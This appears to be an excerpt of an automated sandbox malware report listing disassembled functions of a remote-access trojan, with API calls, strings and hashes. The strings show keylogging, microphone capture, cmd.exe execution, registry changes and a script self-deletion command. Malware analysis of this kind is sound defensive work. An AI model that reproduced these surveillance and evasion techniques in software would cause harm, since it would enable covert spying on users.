                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                • String ID: /sort "Visit Time" /stext "$8>G
                                                                                • API String ID: 368326130-2663660666
                                                                                • Opcode ID: 92b2a62b301968a25cd18ab096c84259c1ee9d5757000a7c8e4b107e00246b2b
                                                                                • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                • Opcode Fuzzy Hash: 92b2a62b301968a25cd18ab096c84259c1ee9d5757000a7c8e4b107e00246b2b
                                                                                • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                Function 0040C580 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                                • ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
                                                                                • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateExecuteExitFileProcessShell
                                                                                • String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                • API String ID: 2309964880-3562070623
                                                                                • Opcode ID: 639022876ca2f318e6976af5514e86a7c38dc019822f533f7746c7bdc912c011
                                                                                • Instruction ID: 568fed376c07edf90cd2df9b8610832c68d616ac56d6d0e00b2c9eff25916ff3
                                                                                • Opcode Fuzzy Hash: 639022876ca2f318e6976af5514e86a7c38dc019822f533f7746c7bdc912c011
                                                                                • Instruction Fuzzy Hash: 692145315042405AC324FB25E8969BF77E4AFD1319F50493FF482620F2EF38AA49C69A
                                                                                Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                                • String ID: Offline Keylogger Started
                                                                                • API String ID: 465354869-4114347211
                                                                                • Opcode ID: d710148bde6815176e432de5b69a9c8f16e0e0b194596ed465d52d43a9505855
                                                                                • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                • Opcode Fuzzy Hash: d710148bde6815176e432de5b69a9c8f16e0e0b194596ed465d52d43a9505855
                                                                                • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                Function 0078AADD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0078AAEB
                                                                                • wsprintfW.USER32 ref: 0078AB6C
                                                                                  • Part of subcall function 00789FBF: SetEvent.KERNEL32(00000000,?,00000000,0078AB83,00000000), ref: 00789FEB
                                                                                Strings
                                                                                • [%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0078AAF4
                                                                                • Offline Keylogger Started, xrefs: 0078AAE4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EventLocalTimewsprintf
                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started
                                                                                • API String ID: 1497725170-184404310
                                                                                • Opcode ID: d5ceb195e9b1766e7296a956330388e17a452e3f282c8842e463cd6a29e782c0
                                                                                • Instruction ID: f701649596e08578d86d1393c6a380ff57f70b07378b2747091e4a1d4dfb77b2
                                                                                • Opcode Fuzzy Hash: d5ceb195e9b1766e7296a956330388e17a452e3f282c8842e463cd6a29e782c0
                                                                                • Instruction Fuzzy Hash: 23119372544118FACB18FB54EC59CFE77B8AE44312B00412AF40296182FF7C5A86C7B5
                                                                                Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                                • String ID: Online Keylogger Started
                                                                                • API String ID: 112202259-1258561607
                                                                                • Opcode ID: 7af2f4e664a0f0d44fe55fdff72d15f713839edd46ab276ae2e5dde9f4d03b19
                                                                                • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                • Opcode Fuzzy Hash: 7af2f4e664a0f0d44fe55fdff72d15f713839edd46ab276ae2e5dde9f4d03b19
                                                                                • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                Function 0044AA73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                • String ID: `@
                                                                                • API String ID: 2583163307-951712118
                                                                                • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                Function 00784B7C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00784BAD
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00784BFB
                                                                                • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 00784C0E
                                                                                Strings
                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 00784BC3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$EventLocalThreadTime
                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                • API String ID: 2532271599-1507639952
                                                                                • Opcode ID: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                                                • Instruction ID: 9b562db21fec8cca6fdada57641b5c8d733bb6876dce242800625f9c66268e84
                                                                                • Opcode Fuzzy Hash: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                                                • Instruction Fuzzy Hash: E011E3719052557BCB11BB7A980DBDB7FAC9B46360F004066F40542152DABCD485CBF6
                                                                                Function 0079A6CA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0079B3C2: GetCurrentProcess.KERNEL32(00000003,?,?,0079A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0079B3D3
                                                                                  • Part of subcall function 0079B3C2: IsWow64Process.KERNEL32(00000000,?,?,0079A6D8,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0079B3DA
                                                                                  • Part of subcall function 0079277A: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 0079279E
                                                                                  • Part of subcall function 0079277A: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 007927BB
                                                                                  • Part of subcall function 0079277A: RegCloseKey.ADVAPI32(?), ref: 007927C6
                                                                                • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,0046662C,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0079A740
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                • String ID: (32 bit)$ (64 bit)$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                • API String ID: 782494840-214125106
                                                                                • Opcode ID: 6ae090941000325c3c897e8fa024b5b50426e295cbf2c4f387652279544f3053
                                                                                • Instruction ID: b784e9d5692df2cb723d196e66cab5cd70ea8e06a276570e1177822467df100f
                                                                                • Opcode Fuzzy Hash: 6ae090941000325c3c897e8fa024b5b50426e295cbf2c4f387652279544f3053
                                                                                • Instruction Fuzzy Hash: 5311E560A40205A6DF05B3A4AC8FE6F766EDB80301F504539B516E32D3EB6C9E4783E6
                                                                                Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                • String ID: Connection Timeout
                                                                                • API String ID: 2055531096-499159329
                                                                                • Opcode ID: 3d68191a8eec2fc769f6dafcc38c8ce992fc9b892c09a3d72c981e2bf00c0901
                                                                                • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                • Opcode Fuzzy Hash: 3d68191a8eec2fc769f6dafcc38c8ce992fc9b892c09a3d72c981e2bf00c0901
                                                                                • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                Function 004016E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • waveInPrepareHeader.WINMM(006A4540,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                • waveInAddBuffer.WINMM(006A4540,00000020,?,00000000,00401913), ref: 0040175D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$BufferHeaderPrepare
                                                                                • String ID: @Ej$`i
                                                                                • API String ID: 2315374483-1446255020
                                                                                • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                Function 0078194F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • waveInPrepareHeader.WINMM(@Ej,00000020,00475BF4,00475BF4,00000000,00475B70,00473EE8,?,00000000,00781B7A), ref: 007819AE
                                                                                • waveInAddBuffer.WINMM(@Ej,00000020,?,00000000,00781B7A), ref: 007819C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wave$BufferHeaderPrepare
                                                                                • String ID: @Ej$`i
                                                                                • API String ID: 2315374483-1446255020
                                                                                • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                • Instruction ID: e8009919869e4681af9e7de07d89636b5fe2d6d9380d468d4346a37cadcc5f18
                                                                                • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                                                • Instruction Fuzzy Hash: AF01D671701310AFD710AF28EC49E65BBB9FB49316B014539F509C3762EB35AC50DB58
                                                                                Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                • String ID: bad locale name
                                                                                • API String ID: 3628047217-1405518554
                                                                                • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                Function 00792939 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 00792948
                                                                                • RegSetValueExA.ADVAPI32(004655B0,0046BE08,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0079BEAD,0046BE08,004655B0,00000001,00473EE8,00000000), ref: 00792970
                                                                                • RegCloseKey.ADVAPI32(004655B0,?,?,0079BEAD,0046BE08,004655B0,00000001,00473EE8,00000000,?,00787C44,00000001), ref: 0079297B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID: Control Panel\Desktop
                                                                                • API String ID: 1818849710-27424756
                                                                                • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                                • Instruction ID: e45f00c8b132aa62bd7a2d458f6af182d637be5ac8ddcb256f71829a2e4c358a
                                                                                • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                                • Instruction Fuzzy Hash: 79F09072580108FBDF01AFA0EC59EEE776CEF00751F104264BA06A61A2EA35DE05DB50
                                                                                Function 00792A3C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 00792A4A
                                                                                • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0078BBB3,004660E0,00000001,000000AF,00465554), ref: 00792A65
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0078BBB3,004660E0,00000001,000000AF,00465554), ref: 00792A70
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID: TUF
                                                                                • API String ID: 1818849710-3431404234
                                                                                • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                • Instruction ID: bd32a0e79821db95541d2b3ae4c1a1883ff7acc82deec1a9cf2175b8afae1505
                                                                                • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                • Instruction Fuzzy Hash: 53E06572540204BBDF21AFA0AC05FDB3BACEB04B95F004060FF05E6191D271CE04D794
                                                                                Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShell
                                                                                • String ID: /C $cmd.exe$open
                                                                                • API String ID: 587946157-3896048727
                                                                                • Opcode ID: 8a4566dbc6588db567efd5ebc16ae0e4f228da1b27707b98e933b39c794e7428
                                                                                • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                • Opcode Fuzzy Hash: 8a4566dbc6588db567efd5ebc16ae0e4f228da1b27707b98e933b39c794e7428
                                                                                • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                                • String ID: pth_unenc
                                                                                • API String ID: 3123878439-4028850238
                                                                                • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                Function 00448D0B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __alldvrm$_strrchr
                                                                                • String ID:
                                                                                • API String ID: 1036877536-0
                                                                                • Opcode ID: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                                                                • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                • Opcode Fuzzy Hash: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                                                                • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                Function 00441A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                • Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                                • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                Function 007C1CE8 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                                                • Instruction ID: c10c3aea10faa5a019d7ae5d9407950959c9c9980adcf09c83222102cb8991c1
                                                                                • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                                                • Instruction Fuzzy Hash: C741E6B1B00704EFD7249F78C849FAA7BB9EB89710F10857EF502DB282D679A9518790
                                                                                Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
